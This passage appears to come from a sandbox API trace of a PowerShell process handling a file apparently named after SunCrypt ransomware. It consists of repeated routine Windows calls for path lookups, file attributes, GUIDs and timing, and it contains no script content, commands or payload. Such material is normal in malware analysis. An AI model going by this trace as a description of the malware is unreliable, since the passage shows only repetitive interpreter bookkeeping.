"c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebe82c | out: lpFileInformation=0x4ebe82c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0100.905] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebe564) returned 1 [0100.905] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0100.905] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0101.168] EtwEventActivityIdControl () returned 0x0 [0101.208] EtwEventActivityIdControl () returned 0x0 [0101.208] EtwEventActivityIdControl () returned 0x0 [0101.208] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xb70778ad, Data2=0x7756, Data3=0x42dd, Data4=([0]=0x94, [1]=0xdc, [2]=0x43, [3]=0x11, [4]=0x47, [5]=0x80, [6]=0x9d, [7]=0xaf))) returned 0x0 [0101.209] CoTaskMemAlloc (cb=0x2cc) returned 0x2f8ac8 [0101.209] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x2f8ac8, nSize=0x164 | out: lpBuffer="") returned 0x0 [0101.209] CoTaskMemFree (pv=0x2f8ac8) [0101.215] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701403145793) returned 1 [0101.215] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0101.215] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0101.215] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0101.215] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0101.215] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0101.216] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0101.216] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0101.219] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701403515590) returned 1 [0101.219] EtwEventActivityIdControl () returned 0x0 [0101.219] EtwEventActivityIdControl () returned 0x0 [0101.219] EtwEventActivityIdControl () returned 0x0 [0101.220] CoCreateGuid (in: pguid=0x4ebecf8 | out: pguid=0x4ebecf8*(Data1=0x8305ba5c, Data2=0x91a8, Data3=0x443d, Data4=([0]=0xbe, [1]=0xf8, [2]=0x66, [3]=0x8b, [4]=0xda, [5]=0x57, [6]=0x15, [7]=0x54))) returned 0x0 [0101.220] CoTaskMemAlloc (cb=0x2d0) returned 0x2f8ac8 [0101.220] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x2f8ac8, nSize=0x166 | out: lpBuffer="") returned 0x0 [0101.220] CoTaskMemFree (pv=0x2f8ac8) [0101.220] EtwEventActivityIdControl () returned 0x0 [0101.220] EtwEventActivityIdControl () returned 0x0 [0101.220] EtwEventActivityIdControl () returned 0x0 [0101.221] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0101.221] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0101.221] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebe568) returned 1 [0101.221] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebe82c | out: lpFileInformation=0x4ebe82c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0101.221] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebe564) returned 1 [0101.221] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0101.221] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0101.224] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebe844 | out: lpPerformanceCount=0x4ebe844*=1701404058793) returned 1 [0101.323] EtwEventActivityIdControl () returned 0x0 [0101.327] EtwEventActivityIdControl () returned 0x0 [0101.327] EtwEventActivityIdControl () returned 0x0 [0101.328] CoCreateGuid (in: pguid=0x4ebf0c0 | out: pguid=0x4ebf0c0*(Data1=0xcaa143d1, Data2=0xe547, Data3=0x4cef, Data4=([0]=0xb0, [1]=0xc5, [2]=0xf3, [3]=0x2e, [4]=0xd4, [5]=0x87, [6]=0xf, [7]=0x22))) returned 0x0 [0101.328] CoTaskMemAlloc (cb=0x2d0) returned 0x2f8ac8 [0101.328] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x2f8ac8, nSize=0x166 | out: lpBuffer="") returned 0x0 [0101.328] CoTaskMemFree (pv=0x2f8ac8) [0101.328] EtwEventActivityIdControl () returned 0x0 [0101.328] EtwEventActivityIdControl () returned 0x0 [0101.328] EtwEventActivityIdControl () returned 0x0 [0101.328] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0101.329] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0101.329] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebe930) returned 1 [0101.329] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebebf4 | out: lpFileInformation=0x4ebebf4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0101.329] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebe92c) returned 1 [0101.329] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0101.329] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0101.530] EtwEventActivityIdControl () returned 0x0 [0101.585] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x114a0a32, Data2=0x2100, Data3=0x4bc1, Data4=([0]=0x95, [1]=0xdd, [2]=0xfe, [3]=0xeb, [4]=0x47, [5]=0x4f, [6]=0xc5, [7]=0x33))) returned 0x0 [0101.585] CoTaskMemAlloc (cb=0x2d0) returned 0x4280e80 [0101.585] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4280e80, nSize=0x166 | out: lpBuffer="") returned 0x0 [0101.585] CoTaskMemFree (pv=0x4280e80) [0101.585] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0101.585] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0101.585] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0101.585] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0101.586] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0101.586] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0101.586] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0101.587] EtwEventActivityIdControl () returned 0x0 [0101.587] EtwEventActivityIdControl () returned 0x0 [0101.587] EtwEventActivityIdControl () returned 0x0 [0101.587] EtwEventActivityIdControl () returned 0x0 [0101.587] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x7d540dee, Data2=0xd500, Data3=0x42f1, Data4=([0]=0x93, [1]=0x45, [2]=0xc7, [3]=0x20, [4]=0x5a, [5]=0x23, [6]=0x5a, [7]=0x97))) returned 0x0 [0101.587] CoTaskMemAlloc (cb=0x2d4) returned 0x4280e80 [0101.587] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4280e80, nSize=0x168 | out: lpBuffer="") returned 0x0 [0101.587] CoTaskMemFree (pv=0x4280e80) [0101.587] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0101.587] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0101.587] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0101.588] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0101.588] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0101.588] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0101.588] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0101.588] EtwEventActivityIdControl () returned 0x0 [0101.589] EtwEventActivityIdControl () returned 0x0 [0101.589] EtwEventActivityIdControl () returned 0x0 [0101.589] CoCreateGuid (in: pguid=0x4ebecf8 | out: pguid=0x4ebecf8*(Data1=0x90cb2e7d, Data2=0x22f, Data3=0x44c5, Data4=([0]=0x85, [1]=0x84, [2]=0x8f, [3]=0x7b, [4]=0x24, [5]=0x33, [6]=0x21, [7]=0x6))) returned 0x0 [0101.589] CoTaskMemAlloc (cb=0x2d4) returned 0x4280e80 [0101.589] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4280e80, nSize=0x168 | out: lpBuffer="") returned 0x0 [0101.589] CoTaskMemFree (pv=0x4280e80) [0101.590] EtwEventActivityIdControl () returned 0x0 [0101.590] EtwEventActivityIdControl () returned 0x0 [0101.590] EtwEventActivityIdControl () returned 0x0 [0101.590] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0101.590] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0101.590] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebe568) returned 1 [0101.590] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebe82c | out: lpFileInformation=0x4ebe82c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0101.590] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebe564) returned 1 [0101.590] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0101.590] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0101.653] EtwEventActivityIdControl () returned 0x0 [0101.687] EtwEventActivityIdControl () returned 0x0 [0101.687] EtwEventActivityIdControl () returned 0x0 [0101.687] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xf200a478, Data2=0xb22c, Data3=0x45b5, Data4=([0]=0x91, [1]=0x6a, [2]=0xb8, [3]=0x72, [4]=0xd9, [5]=0x98, [6]=0x3c, [7]=0xde))) returned 0x0 [0101.688] CoTaskMemAlloc (cb=0x2d4) returned 0x4280e80 [0101.688] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4280e80, nSize=0x168 | out: lpBuffer="") returned 0x0 [0101.688] CoTaskMemFree (pv=0x4280e80) [0101.688] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701450464073) returned 1 [0101.688] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0101.688] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0101.688] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0101.688] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0101.689] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0101.689] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0101.689] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0101.691] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701450745804) returned 1 [0101.691] EtwEventActivityIdControl () returned 0x0 [0101.691] EtwEventActivityIdControl () returned 0x0 [0101.691] EtwEventActivityIdControl () returned 0x0 [0101.691] EtwEventActivityIdControl () returned 0x0 [0101.691] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xc19c7ec7, Data2=0xc397, Data3=0x46ff, Data4=([0]=0xbf, [1]=0xb6, [2]=0x63, [3]=0xb2, [4]=0xec, [5]=0x4, [6]=0x8f, [7]=0xcb))) returned 0x0 [0101.692] CoTaskMemAlloc (cb=0x2d4) returned 0x4280e80 [0101.692] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4280e80, nSize=0x168 | out: lpBuffer="") returned 0x0 [0101.692] CoTaskMemFree (pv=0x4280e80) [0101.693] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701450912897) returned 1 [0101.693] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0101.693] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0101.806] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0101.807] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0101.807] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0101.807] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0101.807] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0101.809] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701462543153) returned 1 [0101.809] EtwEventActivityIdControl () returned 0x0 [0101.809] EtwEventActivityIdControl () returned 0x0 [0101.809] EtwEventActivityIdControl () returned 0x0 [0101.809] EtwEventActivityIdControl () returned 0x0 [0101.810] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xabd306f2, Data2=0x7e8, Data3=0x49fa, Data4=([0]=0x8f, [1]=0x9c, [2]=0xc4, [3]=0xe7, [4]=0x2a, [5]=0x9d, [6]=0x59, [7]=0x56))) returned 0x0 [0101.810] CoTaskMemAlloc (cb=0x2d4) returned 0x4280e80 [0101.810] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4280e80, nSize=0x168 | out: lpBuffer="") returned 0x0 [0101.810] CoTaskMemFree (pv=0x4280e80) [0101.810] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701462698191) returned 1 [0101.810] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0101.811] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0101.811] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0101.811] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0101.811] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0101.811] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0101.811] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, 